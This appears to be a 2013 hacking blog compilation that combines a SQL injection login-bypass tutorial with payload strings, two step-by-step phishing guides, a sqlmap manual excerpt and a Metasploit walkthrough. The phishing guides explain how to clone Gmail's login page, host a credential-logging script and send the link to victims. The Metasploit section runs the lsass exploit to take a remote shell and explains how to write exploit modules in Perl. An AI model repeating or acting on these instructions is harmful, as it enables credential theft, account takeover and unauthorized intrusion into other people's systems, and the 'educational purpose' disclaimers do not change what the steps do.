Thursday, August 29, 2013

Hacking Websites Through Sql Injection

The Most Common Question People often ask from me related to hacking is How Hackers Hack our Websites. Today I am Telling You a Very Important Technique to Hack Websites With a Demo.The Technique i will use is Sql Injection.

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It happens from using poorly designed query language interpreters.

Lets Start Hacking a Website…..

    When You Enter a Username and Password in a Website the query Which is fired is similar to : Select * from Admin where username = ‘ishan’ and password = ’123′ ;

Here Admin is the table name and username,password are columns in the table.

Now I Supply values for username and password as ‘ishan’ and ’123′ and an error is produced.
Now Lets supply username= 1′ or ’1′ = ’1 and password = 1′ or ’1′ = ’1 and let’s see what happen?


The Website is Hacked, 

 Now Lets Go back to Sql Query and see what happen if we replace ‘ishan’ and ’123′ with 1′ or ’1′ = ’1 , Then Query Becomes

Select * from Admin Where username = ’1′ or ’1′ = ’1′ and password = ’1′ or = ’1′ = ’1′



Now as we know if any of the condition in or is true then statement is true therefore username and password may not be equal to ’1′ but ’1′ = ’1′, This is a Universal truth.Since Both Condition of And are true now therefore the whole select query becomes true and it returns the row…

    Now as we don’t enter any valid username and password so Which row from admin table does the Select query will retrieve.Good Question?

It will retrieve the very first row of the table

Now The basic thing in this attack is that we have Fooled the Database by manipulating query..

    You Can try some more username and passwords to fool database:

        admin’–

        ‘) or (‘a’='a

        ”) or (“a”=”a

        hi” or “a”=”a

Hope That You have liked this post and don’t forget to +1 and recommend this site in right pane

Note :This is for Educational Purpose only. Don’t try it to cause any harm to any website or its Database

Step by Step Phishing Tutorial-2

Many people ask me that they want to hack Gmail, Facebook or yahoo id’s of their friends. Today I am sharing with you the concept of Phishing. This is similar to Fishing, where the fisherman puts a bait at the hook, thus, pretending to be a genuine food for fish. But the hook inside it takes the complete fish out of the lake.

Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by letting victim login on a fake page. In Phishing We Create a fake page of the social networking site on which victim has their profile. By gaining trust of Victim We force him to login to our fake page, When Victim login through fake page he will be redirected to a script which saves the information like username and passwords and then let the user login into their original profile.

I am demonstrating the Phishing attack on Gmail id’s. There are basically three steps Which We have to follow.

Just create an account on any free hosting service like t35.com,000webhost,my3gb.com, or heliohost.org so that you can upload your files on a server and let victim login through it.

Go to http://www.gmail.com and save the page on your desktop by going to File Menu. Now open this HTML Page with notepad and find action.Change action to action =”script.php”. script.php is the file on which we want to redirect Victim it contains the programming logic to steal information. Save This Gmail HTML Page as index.html

You can Download the script.php file from here. Just copy the content of this file to a notepad and save it as script.php and don’t forget to choose all documents in Save as Type Textbox.

  Now create a blank Text Document and save it as “Passwords.txt”.Now upload index.html, script.php and Passwords.txt to your Web server like example.t35.com.Now give path of http://example.t35.com/index.html to victim and when he try to login his username, password will be saved in Passwords.txt file and you can read username and password from there.


Note : This tutorial is for Educational and Awareness Purpose only.Please do not use Scripts provided in this tutorial to harm anyone’s resources or steal any confidential information...

Step by Step Phishing Tutorial


What is Phishing ?

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites
, auction sites, online payment processors or IT Administrators are commonly used to lure the unsuspecting. Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require tremendous skill to detect that the website is fake.









How To Do Phishing ?

STEP 1:Firstly U Must Signup For A Free Web Hosting Service Like:
www.freehostia.com
www.ripway.com 

www.000webhost.com
www.my3gb.com
www.blackapplehost.com
etc.....

And Register A Domain Or Subdomain.


After Getting Your Signup Done, You Have Your Own Subdomain Like For Instance You Registered With Freehostia,


Then Your Domain Is Like "Www.Yourname.Freehostia.Com"

STEP 2:
Now Login To Your Freehostia Account And Go To "File Manager" In The Freehostia Control Panel.
 

STEP 3:Now what you have to do is, go to your domain folder like "yourname.freehostia.com" and create a seperate folder in that directory.with the name of the site, for eg. Gmail , if you want to phish a gmail account!

STEP 4:
Now (   click here   )to Download and extract the file "phishers created by me" to your desktop. And then open your "gmail" folder. You'll find three files there viz. "mail.php" , "Log.txt" & "gmail.html" (each phisher folder contains same files)

STEP 5:
Now upload "mail.php" & "index.html" "log.txt" to the "gmail" folder you created inside "yourname.freehostia.com"

So when you're done with the uploading part, the link to your gmail phisher is "www.yourname.freehostia.com/gmail/gmail.html".

STEP 6:
Congrats!! That is your gmail phisher!! Now all you have to do is copy the link to the phisher file i.e. "www.yourname.freehostia.com/gmail/index.htm"
And send it to the victim you want to hack! When he/she'll open that link, it'll be directed to your gmail phisher and when he/she logins that page
He/she'll be redirected to the original "gmail" website and you'll get the password in the "jafar.txt" file which will be created in the gmail folder. You created in your freehostia domain and the path to that file will be "www.yourname.freehostia.com/gmail/jafar.txt" ...

Friday, June 14, 2013

SQL_MAP User manual

Introduction

sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage
of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target
host, the user can choose among a variety of options to perform an extensive back-end database management
system _ngerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges,
databases, dump entire or user's speci_ed DBMS tables/columns, run his own SQL statement, read or write
either text or binary _les on the _le system, execute arbitrary commands on the operating system, establish
an out-of-band stateful connection between the attacker box and the database server via Metasploit payload
stager, database stored procedure bu_erover_ow exploitation or SMB relay attack and more.

1.1      Requirements

sqlmap is developed in Python , a dynamic object-oriented interpreted programming language. This makes
the tool independent from the operating system since it only requires the Python interpreter version equal
or above to 2.5. The interpreter is freely downloadable from its o_cialsite . To make it even easier,
many GNU/Linux distributions come out of the box with Python interpreter package installed and other
Unices and MacOS X too provide it packaged in their formats and ready to be installed. Windows users can
download and install the Python setup-ready installer for x86, AMD64 and Itanium too.
sqlmap relies on the Metasploit Framework for some of its post-exploitation takeover functionalities. You
need to grab a copy of it from the download page. The required version is 3.2 or above, recommended is
the latest 3.3 development version from Metasploit's subversion repository.
Optionally, if you are running sqlmap on Windows, you may wish to install PyReadlinelibrary to be able
to take advantage of the sqlmap TAB completion and history support functionalities in the SQL shell and
OS shell. Note that these functionalities are available natively by Python standard readlinelibrary on
other operating systems. You can also choose to install Psycolibrary to speed up the sqlmap algorithmic
operations.
1.2      Scenario

Let's say that you are auditing a web application and found a web page that accepts dynamic user-provided
values on GET or POST parameters or HTTP Cookie values or HTTP User-Agent header value. You now
1. Introduction 4
want to test if these are a_ected by a SQL injection vulnerability, and if so, exploit them to retrieve as much
information as possible out of the web application's back-end database management system or even be able
to access the underlying operating system.
Consider that the target url is:

http://192.168.1.121/sqlmap/mysql/get_int.php?id=1

Assume that:

http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=1

is the same page as the original one and:

http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=2

differs from the original one, it means that you are in front of a SQL injection vulnerability in the id GET
parameter of the index.php web application page which means that no IDS/IPS, no web application _rewall,
no parameters' value sanitization is performed on the server-side.

This is a quite common _aw in dynamic content web applications and it does not depend upon the back-
end database management system nor on the web application programming language: it is a programmer
code's security _aw. The Open Web Application Security Project rated on 2007 in their OWASP Top Ten
survey this vulnerability as the most common and important web application vulnerability, second only to
Cross-Site Scripting .

Back to the scenario, probably the SQL SELECT statemenet into get_int.php has a syntax similar to the
following SQL query, in pseudo PHP code:
$query = "SELECT [column(s) name] FROM [table name] WHERE id=" . $_REQUEST['id'];
As you can see, appending any other syntatically valid SQL condition after a value for id such condition
will take place when the web application passes the query to the back-end database management system
that executes it, that is why the condition id=1 AND 1=1 is valid (True) and returns the same page as the
original one, with the same content and without showing any SQL error message.

Moreover, in this simple and easy to inject scenario it would be also possible to append, not just one or more
valid SQL condition(s), but also stacked SQL queries, for instance something like [...]&id=1; ANOTHER
SQL QUERY# if the web application technology supports stacked queries , also known asmultiple statements .
Now that you found this SQL injection vulnerable parameter, you can exploit it by manipulating the id
parameter value in the HTTP request.

There exist many resources on the Net explaining in depth how to prevent, how to detect and how to exploit
SQL injection vulnerabilities in web application and it is recommended to read them if you are not familiar
with the issue before going ahead with sqlmap.

Passing the original address,

http://192.168.1.121/sqlmap/mysql/get_int.php?id=1 to sqlmap, the tool
will automatically:

_ Identify the vulnerable parameter(s) (id in this scenario);

_ Depending on the user's options, sqlmap uses the blind SQL injection or the inband SQL injection
technique as described in the following section to go ahead with the exploiting

Metasploit-Again

Lets understand the Metasploit framework by first downloading the file http://www.metasploit.com/tools/framework-2.4.exe. Installing this program creates lots of sub directories under program files.
This product is used to test whether someone else can take over our computers. We are running Windows 2000 and what follows is a short tutorial on how to use this product. We click on Start, Programs, Metasploit Framework, MSf Console. This is a program that runs in a dos box. This is the screen that we see.


+ -- --=[ msfconsole v2.4 [79 exploits - 75 payloads]
msf >

At this prompt we write show exploits to see a list of exploits that come bundled with the product. We teach you how to write your own exploit. Show payloads will display a list of payloads bundled with the product. The exploit lsass_ms04_011 works well with Windows 2000. We then use this exploit by writing use lsass_ms04_011 and the prompt changes for us. To run a exploit we write the command exploit.

msf lsass_ms04_011 > exploit
[*] This exploit requires a valid payload to be specified first.

We get an error as we have not specified a payload to be executed on our target machine. Thus we have to set the PAYLOAD variable by specifying the set command as

msf lsass_ms04_011 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind

The win32_bind is the simplest payload that we can use. This payload simply opens up a dos box on the machine we are running the exploit but the input and output is redirected from the other machine. This means that if we do a dir in the dos box it will happen on the other machine not ours.

msf lsass_ms04_011(win32_bind) > exploit
Error: Missing required option: RHOST

We again write exploit and we get another error. Thus it is better to use the show options to find out what options the exploit and payload require.

msf lsass_ms04_011(win32_bind) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------
  required    RHOST                The target address
  required    RPORT     139        The target port

  Payload:    Name        Default    Description
  --------    --------    -------    -----------------------------------------

  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh
  required    LPORT       4444       Listening port for bind shell

  Target: Automatic

This outputs tells us that the lsass exploit will target port 139 and the RHOST variable is the IP address of the target host that we have to specify. Thus we use the set command once again.

msf lsass_ms04_011(win32_bind) > set RHOST 70.0.0.2
RHOST -> 70.0.0.2

Now when we exploit the target we are in a dos shell as.

msf lsass_ms04_011(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target (MACH2)
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 70.0.0.10:1134 <-> 70.0.0.2:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

This is how we can take over some other machine. Exit takes us out of the dos box. The win32_reverse shell allows the other side to make the connection. This requires our IP address and thus we have to use set LHOST 70.0.0.10 to make the connect. The win32_exec allows us to run a program on the other machine. The name of the program is specified by the CMD variable. Finally to create a new user on the other machine we use the win32_adduser payload. The user and pass variables contain the user name and password. The setg command shows us all the global variables defined. What we do is use setg like set. When we write setg PAYLOAD win32_exec, it creates a global variable PAYLOAD. Using the command save, it save it to a file. This allows the framework to remember variables each time we load the console. The unsetg command removes the variable. There is also a web interface to what we have done. When we run the program MSFWeb it creates a server on 127.0.0.1 port 55555. When we run a browser with the url http://127.0.0.1:55555 we are given a browser interface to the framework.

We move to the directory
"C:\Program Files\Metasploit Framework\home\framework\exploits". Here we create a file zzz.pm and place no code in it at all. The .pm extension tells us that it what we are about to write is  a perl program.

Zzz.pm

We then click on Start, Metasploit Framework, MSF Console. This is the command line shell to run exploits with Metasploit. The usage of Metasploit is specified in our earlier tutorial.  When we run program msfconsole, it first looks into the exploits directory for all files with an extension pm. These files are supposed to carry exploits. The first line of any perl module should start with the name of the module using the package keyword. A perl module is nothing but code that can be called by other. We did not and thus msfconsole complained that it could not figure out the package name for zzz.pm. The program also tells us that we are using version 2.4 and that our copy comes with 75 exploits and 75 payloads.

Zzz.pm
package Msf::Exploit::zzz;

The name of the package is zzz, the same name as the name of the pm file. Also the Msf::Exploit namespace will be explained later. A lot of what we do is to make sure that you understand the code written by the Metasploit team. Thus variable names etc will be chosen as per what we see in the source code. For example the Metasploit team uses a variable called self, so will we. Thus a lot of our code looks and feels like Metasploit as we have learnt from looking at their code. What we forgot to tell you is that all lines of perl code like C end in a semi colon. We will also explain perl programming along the way.

We close msfconsole and start it again, now the package error goes away and we get another error, cannot locate object method new. In perl methods are called subs or sub routines. The Metasploit framework wants to find a method called new and we do not have one. The function new is like the constructor of a class. In Metasploit all initialization code will be place here.

package Msf::Exploit::zzz;
sub new
{
}

We created the method new using the keyword new and now we get some vague error that we cannot fathom. Always close the msfconsole and re run or else the changes will not get reflected.

package Msf::Exploit::zzz;
sub new
{
print "In new\n";
}

In new

We add a new function print that behaves just like a printf, its prints to the console. . As the function new gets first called, the words In new gets displayed on the console.

package Msf::Exploit::zzz;
sub new
{
print "In new @_\n";
}

In new Msf::Exploit::zzz

This function new gets called with some parameters. The variable @_ gives us access to these parameters. By displaying @_ we are displaying all the parameters passed to us. In our case the parameter value is the name of our module zzz. Any variable beginning with @ is an array and beginning with $ is a simple variable.

package Msf::Exploit::zzz;
sub new
{
print "In new @_\n";
$class = shift;
print "class value is $class\n";
}

In new Msf::Exploit::zzz
class value is Msf::Exploit::zzz

We use the shift keyword to place the first parameter passed to the function new into the variable class. The list of  parameters now contain one less entity. In perl whenever we see a dollar sign we know that what follows is a variable. Thus $class gets the value of the module name zzz which we print in the next line. In perl variables do not have a data type like int, char. They are distinguished by the nature of data, $ stands for simple variables, @ for an array etc.

package Msf::Exploit::zzz;
sub new
{
print "In new @_\n";
$class = shift;
print "class value is $class\n";
print "In new @_\n";
}

In new Msf::Exploit::zzz
class value is Msf::Exploit::zzz
In new

Just proving a point. The variable @_ first contained a single value zzz, after shift the value it contains is null or blank. The variable class is a name used extensively by Metasploit. The error does not go away so lets add more code.

package Msf::Exploit::zzz;
use base "Msf::Exploit";
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
return ($self);
}

+ -- --=[ msfconsole v2.4 [77 exploits - 75 payloads]

By adding the above lines of code we breathed a sigh of relief. Finally the system understood us as an exploit and allowed us entry by add increasing the number of exploits by 1 from 75 to 76. If we are moving too fats for your linking read the perl tutorial we have written on our web site at url http://www.vijaymukhi.com/documents/tutorials/perl.html. The syntax SUPER::new is a way of calling the base class new.  The module zzz that wrote will soon be  used by some other code. To activate our module, that user has to use the use keyword with the name of the namespace. This would be use zzz. If the module was defined with a namespace, the name of the namespace follows. Thus use base allows us to use a perl module called base with the namespace Msf::Exploit. Return does what all returns do, return a value back to whoever calls it. We are returning whatever the base class new returns.

msf > show exploits
Metasploit Framework Loaded Exploits

wsftp_server_503_mkd           WS-FTP Server 5.03 MKD Overflow
 zzz                                        No Name

Now that we have the msfconsole prompt we write the commands show exploits. We get a large list of exploits and the last name is ours zzz, but without a name.


package Msf::Exploit::zzz;
use base "Msf::Exploit";
$info = {
'Name' => 'vijay and Sonal Mukhi'
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
return ($self);
}

zzz                            vijay and Sonal Mukhi

The function new of the base class is passed one variable called Info whose value is $info. When we call function in perl the order of parameters is not important. Thus each parameter is send by name. This allows us to specify parameters in any order,  but now we need to remember their names. Thus we are calling the new function with a  single parameter $info but this value is bound to the parameter name Info. The => is part of perl syntax. We now create the variable info. This also uses the same syntax like before. We have only one string value associated with the name Name. The system when it displays all the exploit names, it uses the name variable for the description to be displayed. The name of the array can be whatever we want. We made it info1 and everything worked as advertised.

$info1 = {
'Name' => 'vijay and Sonal Mukhi'
};
$self = $class->SUPER::new({'Info' => $info1});

$self = $class->SUPER::new({'Info1' => $info});

but if we change the name of the parameter to Info1, we get No Name as the answer. This is because we send a parameter bound to the Info1 variable, new wanted it bound to the Info variable.

$info = {
'Name' => 'vijay and Sonal Mukhi',
'UserOpts' => {
'RHOSTS' => [ 0 , 'ADDR' , 'The target address is', '207.46.199.30'],
'RPORT' => [ 1 , 'PORT' , 'Port Number is ', 80]
}
};

msf > use zzz
msf zzz > show options
Exploit Options
  Exploit:    Name      Default          Description
  --------    ------    -------------    ---------------------
  optional    RHOSTS    207.46.199.30    The target address is
  required    RPORT     80               Port Number is

  Target: Targetless Exploit

We now add one more variable UseOpts. Multiple variables are separated by commas within square brackets. This rule applies at every level.  The UserOpts variable is also made up of multiple variables. Thus we start with the square brackets denoting multiple, and then create the individual variables  separated by commas. We create two sub variables, RHOSTS and RPORTS. Most exploits need the address and port number of the host they want to exploit and these variables names are always used. As these variables will have multiple values we use the square brackets to define them. The first is a number 0 means value is optional , 1 means the user must specify it or else the exploit will not run. How we specify values to our options is another story. The next value is what we call the data type of the variable. Then a description of the variable and finally the default value. For the rhost variable we have specified the IP address of Microsoft in single inverted commas and for port number 80, the http port. To use an exploit we first activate it by using the use zzz command. We then run the command show options to give us a list of options. We see our two names, whether the options are optional or required, the default values and finally the Description. All this because we passed this data in our variable to the new function. The only thing left is that the system complains that we have no targets. Lets set it right.

$info = {
'Name' => 'vijay and Sonal Mukhi',
'UserOpts' => {
'RHOSTS' => [ 0 , 'ADDR' , 'The target address is', '207.46.199.30'],
'RPORT' => [ 1 , 'PORT' , 'Port Number is ', 80]
},
'Targets' =>
[
['Windows 2000 SP3'],['Windows 2000 SP4'],['Windows 2000 SP5']
],
'DefaultTarget' => 1
};

msf zzz > show options

Exploit Options
===============

  Exploit:    Name      Default          Description
  --------    ------    -------------    ---------------------
  optional    RHOSTS    207.46.199.30    The target address is
  required    RPORT     80               Port Number is

  Target: Windows 2000 SP4

msf zzz > show targets
Supported Exploit Targets

   0  Windows 2000 SP3
   1  Windows 2000 SP4
   2  Windows 2000 SP5

msf zzz >

We create a third variable targets which contains multiple values and no sub values like UserOpts. Thus we use [] brackets to separate the multiple values. These values in turn can have multiple values and thus another set of []. As of now we have a single values, later on we can have multiple values. The values are the names of the targets that we have tested our exploit on. The reason we want each target to have multiple values is because depends on the type of OS version and service pack, dll’s are loaded  at different memory locations. We can specify these addresses along with the name of the target. This is not enough and we now add one more variable DefaultTarget to specify which target should be used. In our case as we set the value of the variable to 1, the command show options shows us SP4 the second target. We then run the command show targets which displays all the targets. In msfconsole we do not have to key in the entire word, tab completion like linux fills up the rest of the word. Thus we do not type in exploit, exp plus tab completes it for us.

sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
return ($self);
}
sub Exploit
{
print ("In exploit\n");
}

msf > use zzz
msf zzz > exploit
In exploit

Lets now actually run an exploit. Our exploit will simply fetch a page from a web site. We first create a function or sub Exploit. Note that in perl case matters a lot. In msfconsole we first use our exploit and then run the command exploit. This simply calls the function Exploit. Thus whatever code we write in Exploit gets called.

print ("In exploit @_\n");

In exploit Msf::Exploit::zzz=HASH(0x10bfeab0)

The function Exploit also is passed the name of the module.

sub Exploit
{
print ("In exploit \n");
$self = shift;
$target = $self->GetVar("RHOSTS");
$port = $self->GetVar("RPORT");
$target_idx = $self->GetVar("TARGET");
$self->PrintLine("Starting Exploit on $target $port $target_idx");
}

msf zzz > exploit
In exploit
Starting Exploit on 207.46.199.30 80 1

We first set the variable self to the name of the module passes. We would first like to know what the values of the various options the user has chosen. We have a function GetVar which is passed the name of the variable and returns us the value. We thus get the values of the host and port number in target and port. The target_idx variable contains the target variable value. This is 1 as we did not change it.

sub Exploit
{
print ("In exploit \n");
$self = shift;
$target = $self->GetVar("RHOSTS");
$s = Msf::Socket::Tcp->new('PeerAddr' => $target, 'PeerPort' => 80);
if ( $s->IsError)
{
$self->PrintLine('[*] Error creating socket:' . $s->GetError());
return;
}
print "Socket Call OK\n";
}

msf zzz > exploit
In exploit
Socket Call OK

Now we are doing something really useful. The idea of writing a exploit using Metasploit is that it make life simpler for all of us. The framework offers us a class Tcp that handles the Tcp protocol for us. W simply call the new sub with two parameters, the PeerAddr with the targets address and the PeerPort with the port number. We set the PeerAddr parameter to the $target variable which contains a dynamic Ip address and hard code the port number to 80. We then create an instance of this class by calling new. This class creates a connection to the target. The s variable is a socket or handle to the connection. If in error the system sets the IsError member of the socket object to true. This calls our If statement that prints out an error message. His code always calls the PrintLine function off self. Also his code likes displaying a star in []. The GetError function tells us in English why the socket object could not connect to the target. The return keyword stops our exploit if the socket call failed.

sub Exploit
{
print ("In exploit \n");
$self = shift;
$target = $self->GetVar("RHOSTS");
$s = Msf::Socket::Tcp->new('PeerAddr' => $target, 'PeerPort' => 80);
if ( $s->IsError)
{
$self->PrintLine('[*] Error creating socket:' . $s->GetError());
return;
}
print "Socket Call OK\n";
$request = "GET / HTTP/1.0\r\n\r\n";
$s->Send($request);
$a = $s->Recv(-1,1);
print $a;
}

Socket Call OK
HTTP/1.1 200 OK
Connection: close
Date: Tue, 07 Jun 2005 06:40:32 GMT
Server: Microsoft-IIS/6.0

We then set a variable request to the string Get / using the http protocol 1.0. We then use the Send function of the socket class to send the string over. The receive function receives the packets that come from the server and stores it in a. We then print a out which shows us some part of the web page. This is how we can write an exploit that does networking.

When we first started working with Metasploit the problem we had was perl. We believed that most people do not know perl and hence lets take a small break and start learning perl before writing exploits. The problem with learning perl is that it can take a lifetime and hence we went through the code already present in the exploits directory and tried to make sense off it. Thus what follows is a step by step explanation of perl code used in the exploits. The next thing we did was copy all the pm files in the exploits directory to another blank directory and then deleted all the pm files. We also moved into the payloads directory which is at the same level as exploits under framework. We once again copied all pm files into another directory and deleted all but three files, win32_bind.pm, win32_reverse.pm and win32_adduser.pm. We do this as each time we start the console, the extra time it takes to read all exploits and payloads would now not take place. We hate waiting for the msfconsole to start. We write our smallest exploit as z.pm

z.pm
package Msf::Exploit::z;
use base "Msf::Exploit";
sub new
{
$class = shift;
$self = $class->SUPER::new();
}
sub Exploit
{
}

+ -- --=[ msfconsole v2.4 [1 exploits - 3 payloads]

The new method does not have to return a value, the last command output is the return value. Thus the value of  the variable self is returned. We have to use the namespace Msf::Exploit before the name z. All exploits have to have this prefix. The new method does not have to return the name of the info variable. We will write all our code in Exploit which will explain the workings of perl.

sub Exploit
{
print "hi" ." bye" ;
}

hi bye

perl allows us to use the . to concatenate strings. Thus the hi and bye gets joined together. Normally we see a lot of perl code in the exploits as.

sub Exploit
{
$r = "hi" ." bye" ;
$r .= " No";
print $r;
}

hi bye No

We have to send our exploit over. We create a variable r in which we concatenate bits of our payload. The .= is like += in C.

sub Exploit
{
$r = "hi "  ;
$r .= "\x41B\x43D";
print $r;
}

hi ABCD

ASCII is not the best bet for creating exploits. We would like to place actual bytes into our payload. Thus we use a \ followed by the x and the actual hex value. We can mix and match the hex values with ascii.

sub Exploit
{
$r = "hi "  ;
$r .= "AB" x 4;
print $r;
}

hi ABABABAB

Lots of times we have to repeat a certain sequence of bytes. We use the x operator to repeat the last entity. Thus AB gets repeated four times.

sub Exploit
{
$r = "hi "  ;
$r .= "AB" x 4;
print $r x 3;
}

hi ABABABABhi ABABABABhi ABABABAB

The x simply repeats the last command as many times as we ask it to. One valid use is when we want to create a nop sledge. Here we want to repeat a certain sequence of bytes a large number of times.

sub Exploit
{
print "hi";
}

sub Exploit
{
print "hi1";
}

msf > use z
msf z > exploit
hi
msf z > exploit
hi
msf z > reload
msf z > exploit
hi1

We first use our exploit z and then run it, it  displays hi, We then change the hi to hi1 and run the exploit. The system shows us hi and not hi1. Earlier we simply closed and then re ran the console. Here we run the command reload and all the code in z.pm gets reloaded. We now run exploit and we see hi1 and not hi. In future no point in closing and re running the msfconsole. As we proceed in the tutorial we will keep bringing up newer features, but one at a time.

package Msf::Exploit::z;
use base "Msf::Exploit";
use strict;
sub new
{
$class = shift;
$self = $class->SUPER::new();
}

sub new
{
my $class = shift;
my $self = $class->SUPER::new();
}

The first z.pm gives use us lots of errors. This is because we have added the use strict option. This tells perl to be a lot more strict with us. Thus all our variables that we create like class and self have to be prefaced with the keyword my or else an error results. All the exploit code found in the Metasploit exploits use the use strict option and thus we see a large number of my’s around.

package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
'Targets' =>
[
['IA WebMail 3.x', 1036],
['Vijay Mukhi', 2000]
]
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
}
sub Exploit
{
$self = shift;
$idx = $self->GetVar('TARGET');
print $idx . "\n" ;
}

msf z > reload
msf z > exploit
[*] Exploit does not default targets, one must be specified.
msf z > set TARGET 1
TARGET -> 1
msf z > exploit
1

We come back to the good old targets array and as before send the $info array across. When we run the exploit command we get an error as we have multiple targets but we have not selected a target. We use the set command to set the target variable to 1. Here if we write out the target variable in lower case,  we get a warning. When we now run the exploit, the idx variable whose value is stored in the TARGET variable is 1.

sub Exploit
{
$self = shift;
$idx = $self->GetVar('TARGET');
print $idx . "\n" ;
@targets = @{$self->Targets};
print $targets[0]->[0] . "\n" ;
print @targets[1]->[0] . "\n" ;
print @ targets[1]->[1] . "\n" ;
}

1
IA WebMail 3.x
Vijay Mukhi
2000

Any variable starting with @ is an array and hence self->Targets gives us access to our array called Targets. This array is actually an array within an array and hence we the notation targets->0 will access the first array, the ->[0] the first member. Thus targets[1]->[1] will access the second member of the second array. Perl is very accommodating here and whether we use a $ or a @ it does not care. Also the variable @targets could be written as $targets. The only time it gets confused is if we write ${self->Targets} instead of @. This is how we can access any member of the array.

msf z > setg
AlternateExit: 2
DebugLevel: 0
Encoder: Msf::Encoder::PexFnstenvMov
Logging: 0
Nop: Msf::Nop::Pex
RandomNops: 1

We get tired of setting the variables all the time. Using the command setg we can set a variable once and for all.

msf z > setg TARGET 1
TARGET -> 1

msf z > setg
RandomNops: 1
TARGET: 1

The setg command has the same syntax as set but set is only valid for the current session. To make the save permanent we have to use the save command.

msf z > save
Saved configuration to: /home/.msf/config
msf z >

Save saves it to a file config so that we can use it later. Restart msfconsole and we can see the TARGET variable yet defined. This is how we can save time by not specifying the same variables over and over again.

The other values along with the target variable name are some values which depend upon the product or OS version. For example kernel32 starts at different memory locations on different service packs. We can place these values as part of the array. Different products may have a different offset for the buffer overflow depending upon the version. The user does not have to know these values, he chooses the target, the system does the rest. Thus values that change version to version, service pack to service pack, do not have to hard coded in the code but placed in the Targets array.

Now that we have set the target variable, we now remove the Targets array. When we run the command exploit we get an error as we have a TARGET variable defined and no such array in our code.

msf > use z
msf z > exploit
[*] Invalid target specified.

We get the above error and now the only option is to un define the TARGET variable. The unsetg command does what we want.

msf z > unsetg TARGET

sub Exploit
{
print "hi\n";
sleep(5);
print "Bye\n";
}

The sleep function does what it advertises, it sleeps for some time. The time is normally in seconds and one and a half times of what we specified. This function is used to ask us to wait for some time while the exploit is going on.

sub Exploit
{
$r = "Hello";
print length($r);
}

5

The length function returns the length of the string passed. There is no concept of null terminated strings as we have in C.

package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
'Name'  => 'This is the name of the exploit',
'Version'  => '$Revision: 1.22 $',
'Authors' => [ 'Vijay and Sonal', ],
'Arch'  => [ 'x86' , SPARC ],
'OS'    => [ 'win32', 'win2000' , 'linus' ],
'Priv'  => 0,
' UserOpts'  => {
   'RHOST' => [1, 'ADDR', 'The target address'],
   'RPORT' => [1, 'PORT', 'The target port', 80],
},
'Description'  =>  Pex::Text::Freeform (qq{
            This is a nice way of formatting text.
 The line breaks comes the way we like.
}),
'Refs'  =>  [
  ['OSVDB', 2757],
  ['URL',   'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
],
' DefaultTarget ' => 0,
'Targets' =>
[
['IA WebMail 3.x', 1036],
['Vijay Mukhi', 2000]
],
'Keys' => ['mukhi']
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
}
sub Exploit
{
}

msf > info z

      Name: This is the name of the exploit
     Class: remote
   Version: $Revision: 1.22 $
 Target OS: win32, win2000, linus
  Keywords: mukhi
Privileged: No

Provided By:
    Vijay and Sonal

Available Targets:
    IA WebMail 3.x
    Vijay Mukhi

Available Options:

    Exploit:    Name      Default    Description
    --------    ------    -------    ------------------
    required    RHOST                The target address
    required    RPORT     80         The target port

Description:
    This is a nice way of formatting text. The line breaks comes the
    way we like.

References:
    http://www.osvdb.org/2757
    http://www.k-otik.net/exploits/11.19.iawebmail.pl.php

This one just to show you the use of all the members of the Info array. The command info z will show us a list of what information about our exploit is displayed for the user. The Name field is used as the first line of display. The Version is a carbon copy of our version field. The Target OS is the list of OS’s our exploit runs. This is taken from the OS field. There is no error checking done as we know of no OS called linus. The Arch field is not used by info but used later by the web interface. The Keys keyword is the input to the Keywords field  and the Priv field tells us whether the exploit should run as root. Our value is 0 and hence info displays it is No, change it to 1 and the No becomes yes.  The Authors becomes the Provided by and the Targets Available Targets:. The UserOpts becomes Available Options:  which we explained earlier and the Description becomes Descriptions. We are using the Freeform function from the Pex::Text namespace. We writing our description on two lines. It comes on the same line in the output. Finally the refs become References:, where we can read more about the exploit. Every exploit written by the Metasploit has all these variables defined and they cam be safely ignored. The DefaultTarget does not show in the info output.

package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
'Payload' => { 'Space'  => 1024 }
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
}
sub Exploit
{
}

msf z > exploit
[*] This exploit requires a valid payload to be specified first.

The beauty of the Metasploit world is that it allows us to specify a payload that can be send across with our exploit. We start with using the Payload variable with one value space that gives us the size of the payload. When we run the command exploit, we get an error as we have not specified which payload to use.

msf z > setg PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf z > save
Saved configuration to: /home/.msf/config
msf z > exploit
[*] Starting Bind Handler.
[*] Exiting Bind Handler.

